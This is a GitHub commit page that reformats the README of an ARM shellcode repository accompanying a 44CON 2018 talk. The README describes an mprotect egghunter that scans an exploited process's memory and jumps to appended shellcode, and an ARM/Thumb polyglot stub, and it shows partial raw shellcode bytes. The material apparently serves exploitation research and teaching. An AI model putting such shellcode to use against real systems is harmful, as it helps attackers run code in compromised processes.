Skip to content

Commit

Permalink
Shellcode from my talk at 44CON 2018
Browse files Browse the repository at this point in the history
  • Loading branch information
@therealsaumil
therealsaumil committed Sep 18, 2018
1 parent 720f156 commit a8b10c6
Showing 1 changed file with 12 additions and 14 deletions.
26 changes: 12 additions & 14 deletions README.md
View file
@@ -1,13 +1,11 @@
ARM Shellcode
=============
# ARM Shellcode #

1. mprotect egghunter
---------------------
## 1. mprotect egghunter ##

- Searches for an EGG (4+4 byte value) in the memory of the exploited process.
- Uses mprotect() to test the presence of pages in the virtual memory space of the target process.
- mprotect() also marks pages RWX as it scans the virtual memory space.
- Upon finding the pre-defined EGG occuring at consecutive locations, the mprotect egghunter passes on the execution control to the shellcode appended to the eggs.
- Searches for an EGG (4+4 byte value) in the memory of the exploited process.
- Uses mprotect() to test the presence of pages in the virtual memory space of the target process.
- mprotect() also marks pages RWX as it scans the virtual memory space.
- Upon finding the pre-defined EGG occuring at consecutive locations, the mprotect egghunter passes on the execution control to the shellcode appended to the eggs.

RAW SHELLCODE:

Expand All @@ -22,12 +20,11 @@ $mprotect_egghunter = "\x01\x10\x8f\xe2\x11\xff\x2f\xe1" .
"HACK";
```

2. Quantum Leap code
--------------------
## 2. Quantum Leap code ##

- ARM/Thumb Polyglot code.
- Can be started in ARM mode or Thumb mode.
- Irrespective of the mode it is started in, the Quantum Leap code will switch the CPU to Thumb mode and proceed to execute any Thumb shellcode appended to it.
- ARM/Thumb Polyglot code.
- Can be started in ARM mode or Thumb mode.
- Irrespective of the mode it is started in, the Quantum Leap code will switch the CPU to Thumb mode and proceed to execute any Thumb shellcode appended to it.

RAW SHELLCODE:

Expand All @@ -38,6 +35,7 @@ $quantum_leap_stub = "\x19\xa0\x8f\x22\x15\xa0\x8f\x32" .
"\x02\xa0\xbd\x28\x02\xa0\xbd\x38";
```

For more details please browse through my presentation titled "Make ARM Shellcode Great Again" at https://www.slideshare.net/saumilshah/make-arm-shellcode-great-again
For more details please browse through my 44CON 2018 presentation titled "Make ARM Shellcode Great Again" at https://www.slideshare.net/saumilshah/make-arm-shellcode-great-again

@therealsaumil

0 comments on commit a8b10c6

Please sign in to comment.